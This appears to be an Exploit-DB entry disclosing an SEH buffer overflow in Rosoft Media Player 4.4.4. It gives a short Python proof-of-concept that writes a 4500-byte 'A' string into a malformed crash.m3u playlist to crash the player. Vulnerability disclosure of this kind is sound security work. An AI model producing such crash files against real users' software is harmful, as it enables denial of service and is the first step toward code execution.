[] NeoSense

Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)

Author: anonymous
type: dos
platform: windows
port: 
date_added: 2010-08-10 
date_updated: 2010-08-10 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comRosoftMediaPlayerFree.exe

#rosoft media player 4.4.4 SEH buffer overflow POC
#vulnerble application link http://download.cnet.com/Rosoft-Media-Player/3000-2139_4-10044022.html
#tested on XP SP2

#!/usr/bin/python

filename = "crash.m3u"


junk = "\x41" * 4500

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()